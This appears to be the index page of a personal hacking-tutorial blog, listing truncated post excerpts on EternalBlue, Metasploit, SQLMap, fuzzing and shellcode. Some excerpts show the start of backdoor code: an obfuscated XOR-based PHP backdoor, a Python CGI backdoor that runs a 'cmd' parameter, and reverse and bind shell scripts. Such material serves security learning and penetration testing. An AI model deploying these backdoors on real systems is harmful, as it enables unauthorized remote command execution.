Tutorials SMB Exploit (MS17-010) with EternalBlue and DoublePulsar EternalBlue can be used to exploit the Server Message Block (SMB) service without requiring authentication. DoublePulsar is then used to deliver and execute malicious Dynamic-Link Libraries (DLL) or
Tutorials Directory Traversal with DotDotPwn (HTTPS Mode) This is my experience when I was dealing with some applications that have a Directory Traversal vulnerability. I was using DotDotPwn by nitr0us when finding a vulnerability on Quickshare File
Tutorials Non-alphanumeric PHP Simple Backdoor After reading and learning about non-alphanumeric code in PHP, I decided to write my own non-alphanumeric PHP simple backdoor. <? $_="{"; #XOR char $_=($_^"<").($_^">").($_^"/"); #XOR = GET ?> <?=${'_'.
Exploit Development SEH Based Stack Overflow - The Basic This time I will try another stack overflow technique, namely SEH-based stack overflow. What is SEH? Please read about it in the following literature: Structured Exception Handling Win32 Exception handling for assembler
Tutorials MSF Postgres Problem on BT5 If you read this post then I bet you have the same problem as me. When I tried to run msfconsole on my BT5 I got this buggy information.
Tutorials Silent Backdoor with Weevely Ever thought about gaining access to your backdoor undetected? Well, maybe not all web administrators examine their PHP files? Weevely is the answer. Just follow these actions (I was doing
Tutorials Metasploit Meterpreter Command Shell Upgrade Seeing is believing 🙂 [email protected]:~# msfconsole =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 707 exploits - 359 auxiliary - 57 post + -- --=[ 225 payloads
Exploit Development Some Documents of File Specifications/Formats Here are some documents to help you understand some file formats/headers, for file format fuzzing purposes: WAVE PCM soundfile format (RIFF) https://ccrma.stanford.edu/courses/422/projects/WaveFormat/
Tutorials Backtrack 5: How to install VMware Workstation 7.1.3 So I want to install VMware Workstation 7.1.3 on Backtrack 5, but there were errors after I ran the binary (e.g: ./VMware-Workstation-Full-7.1.3-324285.x86_64.bundle)
Tutorials Dump Windows System Info When you are asked to collect all Windows system information such as the list of users, services, installed software and its version, Windows update history, etc., you probably want to see
Tutorials Create a WAR backdoor with Metasploit Facing a Tomcat server and need to upload a WAR backdoor? Well, we can create a WAR backdoor very easily with Metasploit. OK, follow these steps: 1. Creating
Tutorials Remove Comments from Configuration When you want to configure something, the configuration sometimes contains comments from the developer which help us figure out the options of the arguments that will be used. But if you
Tutorials ShodanHQ Queries For Penetration Tester Have you ever heard of the SHODAN search engine? SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described
Tutorials 0day Linux Escalation Privilege Exploit Collection I have created a script that contains local privilege escalation exploits that were published on Exploit-DB.com between October – November 2010. Take a look here: 201011-0day-linux-exploit.tar.bz2 (md5sum: b890f6aeccf1721267166e221cd547df) *Update: I renamed the file and made the script more comfortable.
Tutorials CGI Backdoor for Linux with Python #!/usr/bin/env python # Info : Linux based CGI backdoor with python # author: otoy # date : 0x102010 import cgi,os,re,sys form = cgi.FieldStorage() cmd = form.getvalue('cmd', '') osexe = os.popen(cmd) dirt = os.getcwd()+'/' prognm = sys.argv[0].strip() progfl = re.
Web Security Web Links Gatherer (ver 2) By using Beautiful Soup, we can change the code seen in the previous post to the code below… and it even works much better… just by changing the regex function, it returns a better result : #!/usr/bin/python # otoy -- https:
Tutorials Web Links Gatherer with Python This simple program is used to collect the links found on a web page; it can also be developed into a crawler.. 😀 #!/usr/bin/python #info: program to get info on the links # found in a web page # # otoy(https://otoyrood.wordpress.com) # 0x102010 from urllib import
Tutorials Playing with Strings in Python #!/usr/bin/python import sys pgun='''penggunaan: %s <kalimat> contoh: python %s saya pusing'''%(sys.argv[0],sys.argv[0]) def main(): args = sys.argv[1:] if len(sys.argv) <= 1: print pgun sys.exit(1) #reverse the words (as a list)
Tutorials Reverse Connection Backdoor for Linux #!/usr/bin/python #Info : This is a linux based reverse connection backdoor and # this is NOT an interactive Shell! #Author : otoy #Date : 0x102010 #Blog : otoyrood.wordpress.com import socket,sys,os,re #define osinf = os.uname() info='''==================================== py_backdoor ==================================== Author : otoy Date : 0x102010
Tutorials Bind Backdoor for Linux #!/usr/bin/python # Info: This is a linux based bind backdoor and # this is NOT an interactive Shell! # Author: otoy # Date: 0x102010 # Blog: otoyrood.wordpress.com import socket, sys, os, re def daemonize(): pid = os.fork() if (pid != 0): os._exit(0) def main(
Tutorials A polymorphic shellcode maker /* A polymorphic shellcode maker original program created by Rizki Wicaksono(http://www.ilmuhacking.com) I added some functions to make it more interesting, I added "sub,add" functions beside the original xor into decoder otoy(http://otoyrood.wordpress.com) 0x82010 */ #include <sys/time.
Tutorials Getting User Info (Simple) Using Regex in Python #!/usr/bin/python import os, re osenv = str(os.environ) usrpat = re.compile("'USER': '(.*?)'") homepat = re.compile("'HOME': '(.*?)'") usrp = usrpat.findall(osenv) hmrp = homepat.findall(osenv) print 'USERNAME :' + usrp[0] print 'HOME :' + hmrp[0] in action:
Tutorials Very Simple FTP Fuzzer Written in Python, I tried to make a simple fuzzer for FTP servers. This script will try to fuzz commands like APPE, USER, LIST, CWD, etc. You can find all the commands here 😉 This script is simply a modified version of muts simple ftp
Tutorials Reverse Engineering: Patching a Simple Program By reverse engineering and analyzing a program's code (assembler), we can patch a program by changing its flow to suit what we want. In this post, I will try to explain a little about how to do such patching. We will use the program
Web Security How to: SQLMap (dump and destroy) SQLMap is a tool that automates the exploitation of SQL injection vulnerabilities. This tool is very popular for exploiting SQL injection vulnerabilities. While most web hacking enthusiasts know this tool for gathering information and retrieving table information, I will try to share this